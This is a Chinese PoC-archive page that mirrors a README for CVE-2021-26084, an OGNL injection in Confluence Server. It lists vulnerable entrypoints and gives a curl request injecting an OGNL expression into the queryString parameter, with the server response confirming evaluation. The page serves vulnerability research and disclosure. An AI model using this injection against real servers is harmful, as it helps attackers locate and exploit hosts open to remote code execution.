POC详情: 1697ea35ef508d0f0da1159c6f857e86158c7d7e

来源
https://github.com/alt3kx/CVE-2021-26084_PoC
关联漏洞
标题: Atlassian Confluence Server 注入漏洞 (CVE-2021-26084)
描述:Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。 Atlassian Confluence Server and Data Center 存在注入漏洞,经过身份验证的用户在Confluence 服务器或数据中心实例上执行任意代码。以下产品及版本收到影响:All 4.x.x versions、All 5.x.x versions、All 6.0.x versions、All 6.1.x ver
介绍
# CVE-2021-26084 (PoC) | Confluence Server Webwork OGNL injection

An OGNL injection vulnerability exists that would allow an authenticated user, and in some instances unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.

![poc](https://user-images.githubusercontent.com/3140111/131589227-c305cfb8-bcb9-4c87-a814-9b898fd2f393.png)

My fight to locate the entrypoints and injections XD 

Fight (1) | Fight (2)
 --- | ---
![2021_09_01_00_37_23_Oops_an_error_has_occurred_Confluence_Chromium](https://user-images.githubusercontent.com/3140111/131591912-bfe20ca8-df08-477c-af1c-1c3f3aacbb17.png) | ![2021_09_01_00_40_42_Oops_an_error_has_occurred_Confluence_Chromium](https://user-images.githubusercontent.com/3140111/131591918-1023e2de-3391-46cd-af2a-14d9cac25e63.png)

Finally confluence Entrypoints Exploited 

```
https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action
```
My first manual inspection: Note: Pre-Authenticated user  

```
# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'

Server Response: 

HTTP/1.1 200 
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>

[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />
```

# References: 
https://jira.atlassian.com/browse/CONFSERVER-67940 <br/>
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html <br/>

Amazing writeup posted here: <br/> 
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

Some hints very useful by: <br/>
<em><a href="https://twitter.com/wvuuuuuuuuuuuuu" rel="nofollow">@wvuuuuuuuuuuuuu</a></em><br/>
<em><a href="https://twitter.com/iamnoooob" rel="nofollow">@iamnoooob</a></em><br/>
# Author
Alex Hernandez aka <em><a href="https://twitter.com/_alt3kx_" rel="nofollow">(@\_alt3kx\_)</a></em>
文件快照

 [4.0K]  /data/pocs/1697ea35ef508d0f0da1159c6f857e86158c7d7e
├── [ 34K]  LICENSE
└── [2.3K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。